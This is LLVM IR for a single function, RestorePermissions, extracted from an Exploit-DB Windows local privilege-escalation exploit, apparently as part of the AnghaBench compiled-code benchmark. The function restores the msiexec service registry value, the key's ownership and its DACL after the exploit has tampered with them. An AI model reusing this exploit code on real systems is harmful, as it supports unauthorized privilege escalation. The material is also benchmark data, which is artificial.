; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_43929.c_RestorePermissions.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_43929.c_RestorePermissions.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@SECURITY_NT_AUTHORITY = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [41 x i8] c"\0A[*] Restoring all permissions and value\00", align 1
@.str.1 = private unnamed_addr constant [37 x i8] c"%systemroot%\\system32\\msiexec.exe /V\00", align 1
@SECURITY_BUILTIN_DOMAIN_RID = common dso_local global i32 0, align 4
@DOMAIN_ALIAS_RID_ADMINS = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [38 x i8] c"\0AAllocateAndInitializeSid failed %d\0A\0A\00", align 1
@MSIEXECKEY = common dso_local global i32 0, align 4
@SE_REGISTRY_KEY = common dso_local global i32 0, align 4
@OWNER_SECURITY_INFORMATION = common dso_local global i32 0, align 4
@ERROR_SUCCESS = common dso_local global i64 0, align 8
@.str.3 = private unnamed_addr constant [51 x i8] c"\0A[-] Failed to restore the object's ownership %d\0A\0A\00", align 1
@.str.4 = private unnamed_addr constant [46 x i8] c"\0A[+] Object's ownership successfully restored\00", align 1
@.str.5 = private unnamed_addr constant [42 x i8] c"MACHINE\\SYSTEM\\CurrentControlSet\\Services\00", align 1
@DACL_SECURITY_INFORMATION = common dso_local global i32 0, align 4
@.str.6 = private unnamed_addr constant [50 x i8] c"\0A[-] Failed to copy parent key object's DACL %d\0A\0A\00", align 1
@.str.7 = private unnamed_addr constant [49 x i8] c"\0A[+] Parent key object's DACL successfully saved\00", align 1
@UNPROTECTED_DACL_SECURITY_INFORMATION = common dso_local global i32 0, align 4
@.str.8 = private unnamed_addr constant [46 x i8] c"\0A[-] Failed to restore the object's DACL %d\0A\0A\00", align 1
@.str.9 = private unnamed_addr constant [41 x i8] c"\0A[+] Object's DACL successfully restored\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @RestorePermissions() #0 {
  %1 = alloca i32*, align 8
  %2 = alloca i32*, align 8
  %3 = alloca i32, align 4
  store i32* null, i32** %1, align 8
  store i32* null, i32** %2, align 8
  %4 = load i32, i32* @SECURITY_NT_AUTHORITY, align 4
  store i32 %4, i32* %3, align 4
  %5 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([41 x i8], [41 x i8]* @.str, i64 0, i64 0))
  %6 = call i32 @WriteToRegistry(i8* getelementptr inbounds ([37 x i8], [37 x i8]* @.str.1, i64 0, i64 0))
  %7 = load i32, i32* @SECURITY_BUILTIN_DOMAIN_RID, align 4
  %8 = load i32, i32* @DOMAIN_ALIAS_RID_ADMINS, align 4
  %9 = call i32 @AllocateAndInitializeSid(i32* %3, i32 2, i32 %7, i32 %8, i32 0, i32 0, i32 0, i32 0, i32 0, i32 0, i32** %2)
  %10 = icmp ne i32 %9, 0
  br i1 %10, label %15, label %11

11:                                               ; preds = %0
  %12 = call i32 (...) @GetLastError()
  %13 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([38 x i8], [38 x i8]* @.str.2, i64 0, i64 0), i32 %12)
  %14 = call i32 @ExitProcess(i32 1)
  br label %15

15:                                               ; preds = %11, %0
  %16 = load i32, i32* @MSIEXECKEY, align 4
  %17 = load i32, i32* @SE_REGISTRY_KEY, align 4
  %18 = load i32, i32* @OWNER_SECURITY_INFORMATION, align 4
  %19 = load i32*, i32** %2, align 8
  %20 = call i64 @SetNamedSecurityInfo(i32 %16, i32 %17, i32 %18, i32* %19, i32* null, i32* null, i32* null)
  %21 = load i64, i64* @ERROR_SUCCESS, align 8
  %22 = icmp ne i64 %20, %21
  br i1 %22, label %23, label %27

23:                                               ; preds = %15
  %24 = call i32 (...) @GetLastError()
  %25 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([51 x i8], [51 x i8]* @.str.3, i64 0, i64 0), i32 %24)
  %26 = call i32 @ExitProcess(i32 1)
  br label %27

27:                                               ; preds = %23, %15
  %28 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([46 x i8], [46 x i8]* @.str.4, i64 0, i64 0))
  %29 = load i32, i32* @SE_REGISTRY_KEY, align 4
  %30 = load i32, i32* @DACL_SECURITY_INFORMATION, align 4
  %31 = call i64 @GetNamedSecurityInfo(i8* getelementptr inbounds ([42 x i8], [42 x i8]* @.str.5, i64 0, i64 0), i32 %29, i32 %30, i32* null, i32* null, i32** %1, i32* null, i32* null)
  %32 = load i64, i64* @ERROR_SUCCESS, align 8
  %33 = icmp ne i64 %31, %32
  br i1 %33, label %34, label %38

34:                                               ; preds = %27
  %35 = call i32 (...) @GetLastError()
  %36 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([50 x i8], [50 x i8]* @.str.6, i64 0, i64 0), i32 %35)
  %37 = call i32 @ExitProcess(i32 1)
  br label %38

38:                                               ; preds = %34, %27
  %39 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([49 x i8], [49 x i8]* @.str.7, i64 0, i64 0))
  %40 = load i32, i32* @MSIEXECKEY, align 4
  %41 = load i32, i32* @SE_REGISTRY_KEY, align 4
  %42 = load i32, i32* @DACL_SECURITY_INFORMATION, align 4
  %43 = load i32, i32* @UNPROTECTED_DACL_SECURITY_INFORMATION, align 4
  %44 = or i32 %42, %43
  %45 = load i32*, i32** %1, align 8
  %46 = call i64 @SetNamedSecurityInfo(i32 %40, i32 %41, i32 %44, i32* null, i32* null, i32* %45, i32* null)
  %47 = load i64, i64* @ERROR_SUCCESS, align 8
  %48 = icmp ne i64 %46, %47
  br i1 %48, label %49, label %53

49:                                               ; preds = %38
  %50 = call i32 (...) @GetLastError()
  %51 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([46 x i8], [46 x i8]* @.str.8, i64 0, i64 0), i32 %50)
  %52 = call i32 @ExitProcess(i32 1)
  br label %53

53:                                               ; preds = %49, %38
  %54 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([41 x i8], [41 x i8]* @.str.9, i64 0, i64 0))
  %55 = load i32*, i32** %2, align 8
  %56 = call i32 @FreeSid(i32* %55)
  ret i32 0
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @WriteToRegistry(i8*) #1

declare dso_local i32 @AllocateAndInitializeSid(i32*, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32**) #1

declare dso_local i32 @GetLastError(...) #1

declare dso_local i32 @ExitProcess(i32) #1

declare dso_local i64 @SetNamedSecurityInfo(i32, i32, i32, i32*, i32*, i32*, i32*) #1

declare dso_local i64 @GetNamedSecurityInfo(i8*, i32, i32, i32*, i32*, i32**, i32*, i32*) #1

declare dso_local i32 @FreeSid(i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
